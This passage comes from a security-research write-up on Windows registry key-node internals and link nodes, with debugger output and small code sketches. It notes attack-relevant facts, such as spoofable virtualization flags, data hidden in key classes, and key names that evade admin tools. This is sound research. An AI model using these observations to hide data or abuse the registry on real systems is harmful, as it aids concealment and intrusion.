       +0x014 SubKeyCounts     : [2] Uint4B
       +0x01c SubKeyLists      : [2] Uint4B
       +0x024 ValueList        : _CHILD_LIST
          +0x000 Count            : Uint4B
          +0x004 List             : Uint4B
       +0x01c ChildHiveReference : _CM_KEY_REFERENCE
          +0x000 KeyCell          : Uint4B
          +0x008 KeyHive          : Ptr64 _HHIVE
       +0x02c Security         : Uint4B
       +0x030 Class            : Uint4B
       +0x034 MaxNameLen       : Pos 0, 16 Bits
       +0x034 UserFlags        : Pos 16, 4 Bits
       +0x034 VirtControlFlags : Pos 20, 4 Bits
       +0x034 Debug            : Pos 24, 8 Bits
       +0x038 MaxClassLen      : Uint4B
       +0x03c MaxValueNameLen  : Uint4B
       +0x040 MaxValueDataLen  : Uint4B
       +0x044 WorkVar          : Uint4B
       +0x048 NameLength       : Uint2B
       +0x04a ClassLength      : Uint2B
       +0x04c Name             : [1] Wchar

    In the following subsections, each member is discussed in more detail.

    Signature

    This field always stores the special value 0x6B6E, which translates to 'nk' when written in little-endian. It exists for informational purposes only, and isn't used for anything meaningful in the code after the initial sanitization during load.

    Flags

    This is a highly interesting and security-relevant field, as it indicates the role of the key in the hive, and clarifies how certain parts of the key node are formatted. The present and historical flags are presented in the table below together with their names and descriptions:

    • 0x0001 (KEY_VOLATILE): (Deprecated) The flag used to indicate that the key and all its subkeys were volatile, but it is obsolete now and hasn't been used in several decades. The key's stable/volatile state can be inferred from the highest bit of its cell index.

    • 0x0002 (KEY_HIVE_EXIT): Indicates that the key is the mount point of another registry hive. These special mount points are used to facilitate attaching new registry hives to the global registry view starting at \Registry in a live system. Exit nodes only ever exist in memory, so hives on disk mustn't have the flag set. More on the subject of mount points and exit nodes can be found in the next section, "Link nodes".

    • 0x0004 (KEY_HIVE_ENTRY): Indicates that the given key is the entry to a hive, or in other words, the root of a hive. The flag must be set on the root key of each hive, and mustn't be set on any other nested keys. A hive entry key cannot be a symbolic link (KEY_SYM_LINK mustn't be set).

    • 0x0008 (KEY_NO_DELETE): Indicates that the key cannot be deleted: any attempt to do so will return the error code STATUS_CANNOT_DELETE. This flag is always set on hive exit and hive entry keys, but is not allowed for any other keys.

    • 0x0010 (KEY_SYM_LINK): Indicates that the key is a symbolic link, created by specifying the REG_OPTION_CREATE_LINK flag in the RegCreateKeyEx call. Symbolic links can be created freely: every key other than a hive exit/entry key may be one. They must, however, adhere to additional structural requirements: they may only contain up to one value, and that value must be of type REG_LINK (6), named "SymbolicLinkValue", and a maximum of 65534 bytes long (32767 wide characters).

    • 0x0020 (KEY_COMP_NAME): Indicates that the name of the key consists of ASCII characters only, and thus has been "compressed" to fit two 8-bit characters in each of the 16-bit wide characters of _CM_KEY_NODE.Name. This optimization aims to save storage space and memory, especially as a great majority of keys have simple, alphanumeric names. This flag can be set on virtually every key in the registry, and indeed, it is by far the most commonly used one.

    • 0x0040 (KEY_PREDEF_HANDLE): (Deprecated) The flag used to indicate that the key was a "predefined-handle key", which was a special kind of a symbolic link. The name refers to Predefined Keys, a set of top-level keys such as HKLM or HKCU recognized by the Win32 API. Keys with the KEY_PREDEF_HANDLE flag set allowed the system to redirect certain keys to chosen 32-bit HKEY pseudo-handles, and were specifically introduced in Windows NT 3.5 in 1994 for the purpose of redirecting two system keys related to reading performance data through the registry:

    • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Perflib\009 → HKEY_PERFORMANCE_TEXT
    • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Perflib\CurrentLanguage → HKEY_PERFORMANCE_NLSTEXT

    Contrary to regular symbolic links, predefined keys re-purposed parts of the key node structure (specifically the value list length) to store the link destination, instead of using higher-level features of the format (such as the "SymbolicLinkValue" which is otherwise a perfectly normal value associated with a key). Such a change in semantics required a significant amount of special handling of predefined keys, which were not supposed to be operated on other than being opened. This, in turn, led to a number of security vulnerabilities related to the feature. For a detailed case study of one of them, CVE-2023-35633, see my Windows Registry Deja Vu: The Return of Confused Deputies talk from CONFidence 2024.

    As recently as 2023, all keys other than hive roots could be predefined keys, provided that they had been manually crafted in a binary-controlled hive, because there was otherwise no supported way to create them via API. As a consequence of my reports, the feature was deprecated completely in July 2023 for Windows 10 1607+ and 11, and in December 2023 for older systems. At the time of this writing, the only two predefined keys left in existence are the original "009" and "CurrentLanguage" ones, and all other such keys are transparently converted to normal keys during hive load.
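    Circling back to the KEY_COMP_NAME flag described above, name decompression amounts to choosing between two decodings. A minimal sketch, with latin-1 standing in for the single-byte character interpretation:

```python
KEY_COMP_NAME = 0x0020

def decode_key_name(raw: bytes, flags: int) -> str:
    """Decode _CM_KEY_NODE.Name: with KEY_COMP_NAME set, the name is stored
    as a run of 8-bit characters ("compressed"); without it, the name is
    UTF-16LE."""
    if flags & KEY_COMP_NAME:
        return raw.decode("latin-1")  # one byte per character
    return raw.decode("utf-16-le")    # two bytes per character

print(decode_key_name(b"Software", KEY_COMP_NAME))         # Software
print(decode_key_name("Software".encode("utf-16-le"), 0))  # Software
```

Note that the compressed form halves the on-disk size of the name, which is why the flag appears on nearly every key.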

    Furthermore, there are also three flags related to Registry Virtualization, which was introduced in Windows Vista and is supported up to and including Windows 11:

    • 0x0080 (VirtualSource): Indicates that the key has been subject to virtualization, i.e. that it has a counterpart in the virtual store subtree. It is typically set on keys inside HKLM\Software which a program running as a non-administrator has attempted to open with write access.

    • 0x0100 (VirtualTarget): Indicates that the key is a virtual replica of a key in a global system hive that has been subject to virtualization. It is typically set on keys inside HKU\<SID>_Classes\VirtualStore that have been created as a result of virtualization. It can only be set if VirtualStore (0x200) is set on the key, too.

    • 0x0200 (VirtualStore): Indicates that the key is part of the virtual store registry subtree, typically HKU\<SID>_Classes\VirtualStore and its subkeys. It means that new virtualization targets may be created inside the key, but it itself isn't necessarily a virtual key (unless the VirtualTarget flag is also set).

    As we can see, the purpose of these flags is to keep track of the virtualization state of each key. Given that they express the internal state of the key and are intended to be modified by the kernel only, there doesn't seem to be a good reason to allow user-mode clients to modify the flags on demand. But in practice, unprivileged users have a lot of control over them: programs may arbitrarily set them in hives loaded from disk that they control (app hives and the user hive), and they may also set and clear them at runtime with the NtSetInformationKey(KeySetVirtualizationInformation) system call, as long as they are granted KEY_SET_VALUE access to the key. This makes it effectively possible to "spoof" virtual source/target/store keys, and opens up all of the registry virtualization code for potential abuse by unprivileged users. This has led to the discovery of multiple bugs directly related to virtualization: CVE-2015-0073 and CVE-2019-0881 by James Forshaw, and several more as part of my recent research.

    LastWriteTime

    This is yet another timestamp, in this case tracked on a key-granularity level. I assume it may be an interesting artifact for purposes of digital forensics, but otherwise it doesn't seem particularly security-relevant. One thing of note is that this information is very easy to query at runtime, as it is returned by the RegQueryInfoKey API, and is also a part of the output structures of numerous key information classes that can be queried via the NtQueryKey system call.

    AccessBits

    While theoretically an 8-bit field, this is effectively a 2-bit bitmask introduced in Windows 8 as part of the hive reorganization logic described earlier. It tracks the system phase(s) in which the key has been accessed: 0x0 if not accessed at all, 0x1 if accessed during boot, and 0x2 if accessed during normal system operation. This information is then used during reorganization to allocate key nodes with similar access bits close together.

    LayerSemantics

    This member is a 2-bit enum, used exclusively in hive version 1.6, which corresponds to differencing hives (also known as delta hives). Differencing hives are closely related to containerization support, and their purpose is to be overlaid on another hive in the system rather than being mounted as a standalone hive. For this reason, every key in a differencing hive is in one of four states, which indicate how the key should be interpreted in relation to the keys below it (i.e. the corresponding keys in lower-layer hives).

    These four states are:

    • Merge-Backed (0): the properties of the key are meant to be merged with the properties of the underlying keys in the key stack.
    • Tombstone (1): the key is deleted at the current level, so none of the keys below it should be considered.
    • Supersede-Local (2): the properties of the key fully supersede any state in the key stack below it: only values associated with that level (and any upper layers) are visible to the user.
    • Supersede-Tree (3): same as Supersede-Local, but it applies to the key itself and recursively to all of its subkeys.

    There is also an additional, implicit state called Merge-Unbacked, used to describe keys that don't exist in a hive at a given level, and so they simply fall through to the state represented by keys in the lower layers. Overall, layer semantics play a crucial role in the functionality of layered keys and differencing hives, and their correct handling in the registry implementation is paramount to system security and stability. Unfortunately, the feature is too complex to thoroughly discuss here, but there are some excellent resources on the subject: Microsoft's Containerized Configuration (US20170279678A1) patent, Maxim Suhanov's Containerized registry hives in Windows blog post, and the "Registry virtualization" section in Chapter 10 of the Windows Internals 7 (Part 2) book.

    InheritClass

    This bit is also related to layered keys, and it indicates whether the key inherits the class value from its counterparts lower in the key stack, or defines its own (or lack thereof).

    Parent

    The field identifies the key node that acts as this key's parent within the registry's hierarchical structure. Except for root keys, which exist at the topmost level of a hive, every key must have a valid Parent field. This index plays a vital role in navigating the registry and modifying key relationships. For example, it's essential for determining a key's full path or ensuring correct alphabetical order when renaming a key within its parent's subkey list.

    SubKeyCounts

    This two-element array of DWORDs stores the number of the key's stable and volatile subkeys, respectively. Even though the integers are 32 bits wide, the actual number of subkeys is bounded by how many key nodes can fit in a single storage space: roughly 2 GiB (storage space size) ÷ 84 bytes (minimum key node size) ≈ 25.5 million keys.

    The data in this field is somewhat redundant, as the same information is also stored in the subkey indexes themselves. Nevertheless, the cached numbers stored directly in the key node make it possible to efficiently query the numbers of subkeys with API such as RegQueryInfoKey. The kernel does its best to keep the two copies of the information in sync, and any discrepancies between them may lead to memory corruption vulnerabilities.

    SubKeyLists

    This is another two-element array, which complements the previous SubKeyCounts member by providing cell indexes to the corresponding subkey lists for each storage type. The format of these lists is discussed in detail in the "Subkey indexes" section below; for now, it's only important to know that if SubKeyCounts[x] > 0, then SubKeyLists[x] is expected to be a valid cell index, otherwise it should be equal to HCELL_NIL (-1). Furthermore, because the volatile space is a strictly in-memory concept that doesn't exist on disk, newly loaded hives are always expected to have SubKeyCounts[1] set to 0 and SubKeyLists[1] set to HCELL_NIL.

    ValueList

    This is a structure of type _CHILD_LIST, which consists of two 32-bit integers: the number of values associated with the key, and a cell index of the actual value list. Here, there is no distinction between stable and volatile values: for any given key, the values always inherit the storage type of the key, so either all of them are stable, or all of them are volatile. Similarly to subkey lists, though, if ValueList.Count is 0, then ValueList.List must be HCELL_NIL.

    As mentioned earlier, this field also had a second meaning if the key was a predefined key: in that case, ValueList.Count contained an arbitrary value with the highest bit set, which indicated the top-level HKEY to redirect to, and ValueList.List was completely unused and could contain arbitrary data. As you can imagine, whenever an internal system function started to use such a value list with the assumption it was a normal key, it would operate on an inadequately huge count and an invalid cell index, wreaking havoc in the kernel. Thankfully, this is no longer a possibility due to the deprecation of predefined keys in 2023.

    ChildHiveReference

    You may have noticed that ChildHiveReference is part of a union, as it resides at the same offset as the SubKeyLists member (offset 0x1C). It is a special object that is used to implement hive mounting under the \Registry tree, and is unique to keys that have the KEY_HIVE_EXIT flag set (i.e. exit nodes). It is only ever used in memory, and is therefore not applicable to regular hives stored on disk. Its two fields specify the root key of the mounted hive, as a pair of a kernel pointer to the _HHIVE descriptor structure and the cell index of the root key. This breaks the fundamental invariant that hives are self-contained and don't store any virtual address pointers, only cell indexes. It is the only exception to the rule, and it exists only because it is a necessary hack/workaround to implement a feature that hives normally don't support: attaching one hive to another in the global system view.

    The field and its usage are discussed in more detail in the "Link nodes" section below.

    Security

    This is the cell index of the security descriptor cell corresponding to the key. It is a mandatory field for every type of key in the registry (symbolic links, previously predefined keys etc.), with the only exception being system-managed exit nodes. For every key that has an invalid security descriptor during hive load (e.g. set to HCELL_NIL or just an invalid cell index), it is automatically fixed up to inherit the security descriptor of its parent key. If the root key of a hive has invalid security, the whole hive is rejected with the STATUS_REGISTRY_CORRUPT error code.

    The security descriptor cell always has the same storage type as the key(s) that it is associated with. So for example, if there are two keys in a hive with the same security properties, one in the stable and the other in the volatile space, then they will reference two different stable/volatile security cells with equivalent data.

    For obvious reasons, the correct handling of this field is crucial to overall system security. In the course of my research, I have discovered 9 vulnerabilities directly involving the handling of security descriptors, and a further 4 reported to Microsoft outside of the tracker (WinRegLowSeverityBugs #1, #10, #13, #20). They generally didn't have much to do with the _CM_KEY_NODE.Security field specifically, but rather the formatting of the security cells and higher-level logic related to them:

    • Binary formatting of the SECURITY_DESCRIPTOR_RELATIVE structure
    • Maintaining the consistency of the doubly-linked list of security descriptors in the hive
    • Reference counting security descriptors when operating on keys
    • Enforcing proper access checks when opening and creating keys

    Overall, this is probably the most interesting field in the structure from a security research perspective.

    Class and ClassLength

    In technical terms, a key class is an optional, immutable blob of 1-65535 bytes associated with a key. It can only be set once, during the creation of a key, through the lpClass argument of the RegCreateKeyExW API (or the equivalent Class parameter of the NtCreateKey system call). It can then be queried with functions such as RegQueryInfoKey, but cannot be modified without deleting and re-creating the key. If the class exists, then the ClassLength field is set accordingly, and Class is a cell index that points to its backing buffer. Otherwise, ClassLength is set to 0 and Class is HCELL_NIL (-1).
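    The Class/ClassLength coupling described above boils down to a simple consistency predicate, sketched here for illustration:

```python
HCELL_NIL = 0xFFFFFFFF

def class_fields_consistent(class_index: int, class_length: int) -> bool:
    """The invariant described above: either the key has no class
    (ClassLength == 0 and Class == HCELL_NIL), or it has one of 1-65535
    bytes backed by a valid cell index."""
    if class_length == 0:
        return class_index == HCELL_NIL
    return 1 <= class_length <= 65535 and class_index != HCELL_NIL

print(class_fields_consistent(HCELL_NIL, 0))   # True: no class at all
print(class_fields_consistent(0x1020, 16))     # True: a 16-byte class
print(class_fields_consistent(HCELL_NIL, 16))  # False: length without a cell
```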

    Conceptually, a class can be viewed as an extra, hidden value of a key, existing alongside the normal value list. It is not displayed anywhere in the Regedit GUI, but if it exists for a given key, it can be retrieved by using the "Export" option in Regedit to save the key to a .txt file, which also exports the class data. It has existed since the earliest version 1.0 of the regf format – perhaps as a way to store the "type" of a key similar to how every value has a defined type. Today, it seems to be a mostly obsolete mechanism that doesn't see much use; even Raymond Chen wrote in his What is the terminology for describing the various parts of the registry? blog in 2009:

    Bonus chatter: There’s also this thing called a class. I have no idea what it’s for, so don’t ask.

    When I ran a quick scan of the Windows 11 registry, I found the following unique strings being used at least once as a key class:

    • "DynDRootClass"
    • "GenericClass"
    • "Network ComputerName"
    • "REG_SZ"
    • "Shell"

    The Windows NT Registry File (REGF) format specification lists several other values that have been observed in the past, such as "activeds.dll ", "Cygwin", "OS2SS" or "TCPMon". It is worth noting that the class was also used to store the encryption keys for the now-deprecated SAM database encryption mechanism known as SysKey. Overall, due to its simplistic nature, key classes are not particularly security-relevant, but may be of interest in the context of obfuscation and hiding data, as they are easily accessible and yet a largely overlooked part of the registry.

    MaxNameLen, MaxClassLen, MaxValueNameLen and MaxValueDataLen

    These four fields store cached information about the maximum lengths of several properties of the key or its subkeys:

    • MaxNameLen: the maximum length of a subkey's name,
    • MaxClassLen: the maximum length of a subkey's class information,
    • MaxValueNameLen: the maximum length of a value name associated with the key,
    • MaxValueDataLen: the maximum length of a value data associated with the key.

    The presumed purpose of these members is to facilitate a quick lookup of the per-key limits, such that when a client application wants to enumerate/query subkeys or values, it can simply allocate a single buffer guaranteed to accommodate every possible key name, value name, etc. And so, their exact values can be retrieved with the RegQueryInfoKey API via the lpcbMaxSubKeyLen, lpcbMaxClassLen, lpcbMaxValueNameLen and lpcbMaxValueLen arguments.

    Although querying these limits seems convenient, there are some caveats that are important to keep in mind:

    • The fields are intended to represent an upper bound on the number of bytes required to store the given property, but not necessarily an optimal one (i.e. the smallest sufficient length). For example, when a key with formerly the longest name is deleted, the MaxNameLen field of the parent is not updated with the value of the second-largest length, as that would require the lengthy process of iterating through all of the subkeys again. Therefore, relying on those values may incur some unwanted memory overhead.
    • When operating on registry keys that are globally visible in the registry tree, it is possible that a race condition with another application causes one of the maxima to change in between the RegQueryInfoKey call and the actual data query. To address this, applications should include fallback logic to allocate more memory in the rare case when the obtained maximum proves insufficient.
    • To add to the previous point, after having reverse-engineered and reviewed most of the Configuration Manager code, it is my instinct that these fields continue to be supported throughout the development of new registry features (e.g. differencing hives), but it is mostly on a best-effort basis. For example, during hive load, only MaxValueNameLen and MaxValueDataLen are enforced to have the correct values, while MaxNameLen and MaxClassLen remain unchecked. For this reason, I would personally not rely on the consistency of those values for the security of any client code, and would treat them more as a guidance/supplementary information than the sole source of truth about the key limits.
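    The upper-bound behavior of these cached maxima can be illustrated with a toy model (a hypothetical Python sketch with made-up names, not kernel code): the cached value is bumped on subkey creation, but never recomputed on deletion.

```python
# Toy model of the MaxNameLen caching behavior described above:
# the cached maximum only ever grows, so after deleting the
# longest-named subkey it overestimates the true maximum.
class KeyNode:
    def __init__(self):
        self.subkeys = {}
        self.max_name_len = 0  # cached, in bytes (2 bytes per WCHAR)

    def create_subkey(self, name):
        self.subkeys[name.upper()] = name
        self.max_name_len = max(self.max_name_len, 2 * len(name))

    def delete_subkey(self, name):
        del self.subkeys[name.upper()]
        # max_name_len is deliberately left untouched, mirroring the
        # kernel's choice of avoiding a full re-scan of the subkeys.

    def true_max_name_len(self):
        return max((2 * len(n) for n in self.subkeys.values()), default=0)

key = KeyNode()
key.create_subkey("Short")
key.create_subkey("AVeryLongSubkeyName")
key.delete_subkey("AVeryLongSubkeyName")
# The cache still reports the stale maximum: a safe upper bound,
# but no longer the smallest sufficient length.
print(key.max_name_len, key.true_max_name_len())  # 38 10
```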

    UserFlags

    This is a field whose name, offset and function (so basically every aspect) have been subject to change over the years. Its current form has existed since Windows Vista, and occupies bits 20-23 of MaxNameLen, which had been previously a 32-bit integer, but was later reduced to 16 bits to make room for these extra flags. In theory, its name may suggest that this member is meant to store user-defined data, but in practice, Microsoft developers quickly found their own use for the bitmask: storing flags related to the Registry Reflection mechanism for providing interoperability between 32-bit and 64-bit applications. You can read more about the meaning of each specific flag here, but in short, this was where reflection-specific configuration was internally saved by API functions such as RegEnableReflectionKey and RegDisableReflectionKey, and retrieved by RegQueryReflectionKey.

    However, this specific use seems to have been short-lived, as Registry Reflection was soon deprecated in Windows 7. Since then, it could indeed be considered as four extra bits of user-controlled storage per key, accessible for reading via NtQueryKey(KeyFlagsInformation) and for writing via NtSetInformationKey(KeyWow64FlagsInformation). Beyond being interesting for historical reasons, the field doesn't play any important role in security.

    VirtControlFlags

    This field is another one introduced around Windows XP SP3 / Windows Vista that took over some of the space from MaxNameLen. It is related to Registry Virtualization and takes up four bits in the _CM_KEY_NODE structure definition, but there are only three flags that it can really store:

    • 0x1 – REG_KEY_DONT_VIRTUALIZE: Disables virtualization for the specific key.
    • 0x2 – REG_KEY_DONT_SILENT_FAIL: Prevents the system from re-opening a virtualized key with MAXIMUM_ACCESS if the initial Open operation with the desired access rights has failed.
    • 0x4 – REG_KEY_RECURSE_FLAG: Causes new subkeys of the key to inherit its virtualization-related configuration.

    The flags are not sanitized in any way during hive load and so may be set to arbitrary values. They can also be modified programmatically by using the NtSetInformationKey(KeyControlFlagsInformation) system call, or even from the Windows command line, by using the REG FLAGS command:

    C:\>reg flags /?

    REG FLAGS KeyName [QUERY |

                       SET [DONT_VIRTUALIZE] [DONT_SILENT_FAIL] [RECURSE_FLAG]]

                      [/reg:32 | /reg:64]

      Keyname    "HKLM\Software"[\SubKey] (Restricted to these keys on

            local machine only).

        SubKey   The full name of a registry key under HKLM\Software.

      DONT_VIRTUALIZE DONT_SILENT_FAIL RECURSE_FLAG

        Used with SET; flags specified on the command line will be set,

            while those not specified will be cleared.

      /reg:32  Specifies the key should be accessed using the 32-bit registry view.

      /reg:64  Specifies the key should be accessed using the 64-bit registry view.


    More information about these flags can be found in the documentation of the ORSetVirtualFlags API function, a part of the Offline Registry Library. In the context of registry security research, I haven't found them particularly interesting – the other virtualization-related flags in the "Flags" field have proved to be much more useful in that regard.

    Debug

    In Debug/Checked builds of Windows, it used to be possible to have the kernel trigger a breakpoint when performing a specific operation on a specific registry key. To enable the option, an administrator would have to set the HKLM\System\CurrentControlSet\Control\Session Manager\Configuration Manager\RegDebugBreaksEnabled value to 1, which would propagate to the global kernel CmpRegDebugBreakEnabled variable. Then, the "Debug" field of each key would store a bitmask indicating which subset of eight possible operations should be interrupted for the given key:

    • 0x01 – BREAK_ON_OPEN
    • 0x02 – BREAK_ON_DELETE
    • 0x04 – BREAK_ON_SECURITY_CHANGE
    • 0x08 – BREAK_ON_CREATE_SUBKEY
    • 0x10 – BREAK_ON_DELETE_SUBKEY
    • 0x20 – BREAK_ON_SET_VALUE
    • 0x40 – BREAK_ON_DELETE_VALUE
    • 0x80 – BREAK_ON_KEY_VIRTUALIZE

    Whenever a breakpoint was triggered by this mechanism, the kernel would also print out a corresponding message for the attached debugger, for instance:

    DbgPrint("\n\n Current process is deleting a key tagged as BREAK ON DELETE");

    DbgPrint(" or deleting a subkey under a key tagged as BREAK_ON_DELETE_SUBKEY\n");

    DbgPrint("\nPlease type the following in the debugger window: !reg kcb %p\n\n\n", Kcb);


    Now that the Debug/Checked builds have been discontinued – or at least not released publicly anymore for the latest versions of Windows 10/11 – the "Debug" field is just an unused byte in the key node structure.

    WorkVar

    According to an unofficial format specification, WorkVar used to be an internal-use member meant to be only ever accessed by the kernel in order to optimize key lookups. The last version of Windows where WorkVar was still in active use was Windows 2000; since Windows XP, it has simply been another four bytes of unused memory in the key node data layout.

    NameLength and Name

    The combination of these two fields specifies the name of the key: NameLength indicates the length of the string in bytes, and Name is an inline, variable-length buffer at the end of the structure that stores the name itself. There are a number of considerations and consistency requirements related to registry key names, enforced when loading a hive and later at runtime:

    • Compression: If the KEY_COMP_NAME (0x20) flag is clear in _CM_KEY_NODE.Flags, the name is formatted as a wide string of 16-bit characters. If it is set, which is the common scenario, then "Name" represents a more tightly packed ASCII string of 8-bit characters. Considering that a majority of keys in the registry are alphanumeric, this optimization saves a non-trivial amount of memory and disk space. It is interesting to note that it is still possible to load a hive with a non-optimally formatted key name (non-compressed ASCII string), but such a key node would never be generated by Windows itself.
    • Length: The key name mustn't be empty (i.e. it should be at least one character long), and it cannot exceed 256 characters in length (even though Registry element size limits incorrectly claims that the limit is 255). The NameLength field value is expressed in bytes, so it must be between 1-256 for compressed names, and 2-512 for wide strings (and divisible by two). Up until October 2022, this limit was not correctly enforced, making it possible to load hives with key names up to 1040 characters, which would then be mishandled or outright rejected by other parts of the registry code.
    • Charset: All characters in the 0x0000 – 0xFFFF range are allowed in a key name with the exception of backslash ('\', 0x005C). The backslash is singled out because it plays a special role in the registry, separating distinct elements of the registry paths. Since the kernel must always be able to distinguish parts of key names from the separator, a decision was made to exclude this one character from the key name charset, similar to how backslashes are not allowed in file names. Furthermore, there is a second minor requirement that the key name must not start with a null character, but it may be present at any other position in the name (this only started to be properly enforced in NtRenameKey after the fix for CVE-2024-26178 in March 2024). Overall, this means that key names aren't truly textual strings in the conventional sense of the word: they don't use a terminator, and may contain all sorts of non-printable characters. It would be more appropriate to think of them as binary blobs used to reference registry keys, which doesn't have any consequences for the kernel, as it universally uses the UNICODE_STRING structure that includes both the length and the backing buffer of the string anyway. But if a potentially malicious program were to create a key with an unusual name (e.g. including a null character), it could prove difficult for an administrator to operate on it with the built-in registry utilities (reg.exe, Regedit), or even with third-party tools that use the high-level API (such as RegOpenKeyEx). In such cases, it might be required to use specialized tools that interact with the Windows registry directly through the system call interface as the only way to examine/modify such keys.
    • Uniqueness: One of the most important invariants of the Windows registry implementation is the uniqueness of key names: there may be only one key with a specific path, or in other words, for every key, there mustn't be any duplicates in the list of its subkeys. Given that registry key names are case-insensitive, any two names are always compared in their uppercase form to determine if they are equal or not. This uniqueness requirement is enforced both during hive load and subsequent operations, and failure to do it correctly could lead to both logic bugs and memory corruption. For some examples of the potential outcomes of allowing duplicate key names in registry, see Maxim Suhanov's The uppercased hell blog or my CVE-2023-21748 / CVE-2023-23420 bug reports.
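    The naming rules above can be condensed into a short sketch (a hypothetical helper: encode_key_name and its exact checks are mine, derived from the constraints listed, not from the actual kernel routines; note also that Python counts code points where the kernel counts 16-bit units):

```python
KEY_COMP_NAME = 0x0020  # flag in _CM_KEY_NODE.Flags

def encode_key_name(name: str):
    """Return (flags, name_bytes), using the compressed 8-bit form
    when every character fits in one byte, and UTF-16LE otherwise."""
    if not 1 <= len(name) <= 256:
        raise ValueError("key name must be 1-256 characters long")
    if "\\" in name:
        raise ValueError("backslash is reserved as the path separator")
    if name[0] == "\x00":
        raise ValueError("key name must not start with a null character")
    if all(ord(c) <= 0xFF for c in name):
        return KEY_COMP_NAME, name.encode("latin-1")  # 1 byte per char
    return 0, name.encode("utf-16-le")                # 2 bytes per unit

flags, raw = encode_key_name("Session Manager")
print(hex(flags), len(raw))   # compressed form, 15 bytes
flags, raw = encode_key_name("🐂")
print(flags, len(raw))        # wide form, 4 bytes (a surrogate pair)
```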

    Another intriguing aspect of the key names are the names associated with the root keys of default system hives. In general, every registry key in Windows is referenced by its name specified in the key node, except for root keys, which are known by the name of their mount points. As a result, the "real" underlying names of root keys are never visible to users or applications, but they are nevertheless present in the hive file as a mandatory part of every key node, and could be potentially used to learn something about how these fundamental system hives (SOFTWARE, SYSTEM etc.) are generated.

    I have examined hives from various Windows versions ranging from Windows NT 3.1 to Windows 11, and arrived at the following list of per-version root key names:

    Version

    Root key name

    NT 3.1 - NT 4.0

    Same as the hive name (e.g., "SYSTEM")

    2000 - XP

    $$$PROTO.HIV

    Vista - 7

    CMI-CreateHive{RANDOM GUID}

    8

    CsiTool-CreateHive-{00000000-0000-0000-0000-000000000000}

    10 - 11

    ROOT

    In early NT versions, the root key name simply mirrored the hive's file name. In Windows 2000 and XP, the name stemmed from the fact that system hives were created during system installation by temporarily creating the tree root under \Registry\Machine\SYSTEM\$$$PROTO.HIV, pre-initializing it with the default data for the given hive, and saving it to a file with an API like RegSaveKeyEx.

    In Windows 10 and 11, the name is simply "ROOT", which, along with the "OfRg" magic bytes at offset 0xB0 in the file header, hints that the hives are created with the Offline Registry Library. This leaves versions between Windows Vista and Windows 8 as the big unknown: neither "CMI-CreateHive" nor "CsiTool-CreateHive" sound particularly familiar, and I haven't been able to find any information about them in any public resources. It is probably safe to assume that these strings are indicative of some internal Microsoft tooling that was used to generate hives for these systems, but not much is known beyond it. Nevertheless, I find it fascinating that such little tidbits of information can be found in obscure corners of file formats. You never know when some other missing part of the puzzle becomes known publicly, making it possible to finally connect the dots and see the bigger picture, sometimes years or decades after the initial release of the software.

    Link nodes

    As mentioned above, link nodes are a special type of key node designed to facilitate the mounting of arbitrary hives from disk into the global registry view. They are managed by the Windows kernel and only ever exist in memory. They are represented by the _CM_KEY_NODE structure, but with the following differences compared to regular keys:

    • The Signature field is set to 0x6B6C ('lk') instead of 0x6B6E ('nk'),
    • The KEY_HIVE_EXIT (0x0002) flag is set in Flags,
    • The key doesn't have any of the standard key properties, such as the security descriptor, class, subkeys or values. The only cell reference it contains is to its parent cell, which is one of \Registry\A, \Registry\Machine, \Registry\User or \Registry\WC.
    • Instead of the SubKeyLists member at offset 0x1C, the link node uses the ChildHiveReference field of type _CM_KEY_REFERENCE, which stores a kernel-mode pointer to the destination hive descriptor (_HHIVE*), and the cell index of the root key within that hive.

    So, whenever you see a hive root key (e.g. any key within HKLM or HKCU), you are actually looking at a pair of a link node (also known as exit node) + root key (a.k.a. entry node – these terms are used interchangeably). The mount point assumes the key name of the link node (so that it is easily enumerable with the existing kernel logic), and all of the characteristics of the entry node. This is illustrated in the following diagram, where the key marked in red is the link node of the SYSTEM hive, and the green one is the root key:

    Diagrammatic illustration and visual representation of the paragraph above

    The existence of link nodes seems to be very little known and scarcely documented in public resources, which is likely caused by the fact that the Windows kernel makes them virtually invisible, and not just for users and high-level API clients, but even for administrators and kernel driver developers. The way the registry tree traversing code is structured, whenever it encounters a link node, it always makes sure to skip over it and reference the corresponding entry node. This means that it is impossible to open or otherwise observe the link node itself from the context of user-mode, but if we put in some effort, we should be able to see it in WinDbg attached as a kernel debugger. We can approach the link node from two sides: either try to find it top-down starting from the master hive, or by locating a key in a mounted hive and traversing the registry tree upwards.

    In this post, we will proceed with the first idea and enumerate the keys within \Registry\Machine (i.e. HKLM):

    0: kd> !reg querykey \registry\machine

    Found KCB = ffff800f88ad96e0 :: \REGISTRY\MACHINE

    Hive         ffff800f88a88000

    KeyNode      ffff800f88ada16c

    [SubKeyAddr]         [SubKeyName]

    ffff800f88ada44c     BCD00000000

    ffff800f88ada3cc     HARDWARE

    ffff800f88ada59c     SAM

    ffff800f88ada504     SECURITY

    ffff800f88ada374     SOFTWARE

    ffff800f88ada31c     SYSTEM

     Use '!reg keyinfo ffff800f88a88000 <SubKeyAddr>' to dump the subkey details

    [ValueType]         [ValueName]                   [ValueData]

    REG_DWORD           ServiceLastKnownStatus        2


    Here, we can see all the system hive mount points together with their corresponding link node addresses. In the case of normal, stable keys, these would be user-mode addresses within the address space of the Registry process, but since the master hive is a volatile one, all of its structures are stored on the kernel pools. We can then use a command such as !reg knode to query any of the specific subkeys, e.g. SYSTEM:

    0: kd> !reg knode ffff800f88ada31c

    Signature: CM_LINK_NODE_SIGNATURE (kl)

    Name                 : SYSTEM

    ParentCell           : 0x168

    Security             : 0xffffffff [cell index]

    Class                : 0xffffffff [cell index]

    Flags                : 0x2a

    MaxNameLen           : 0x0

    MaxClassLen          : 0x0

    MaxValueNameLen      : 0x0

    MaxValueDataLen      : 0x0

    LastWriteTime        : 0x 1db2b94:0xe031a530

    SubKeyCount[Stable  ]: 0x0

    SubKeyLists[Stable  ]: 0x20

    SubKeyCount[Volatile]: 0x0

    SubKeyLists[Volatile]: 0xffffffff

    ValueList.Count      : 0x88a8e000

    ValueList.List       : 0xffff800f


    As expected, the key node has the special link node signature ('kl'), and the 0x2 flag set within the 0x2a Flags bitmask (the other two flags set are KEY_NO_DELETE and KEY_COMP_NAME). The command gets a little confused, because it expects to operate on a regular key node and display its subkey/value counts and lists, but as mentioned above, this space is taken up by the _CM_KEY_REFERENCE structure in the link node. If we line up the offsets correctly, we can decode that the exit node points at cell index 0x20 in hive 0xffff800f88a8e000, which is consistent with the outcome of displaying the structure data directly:

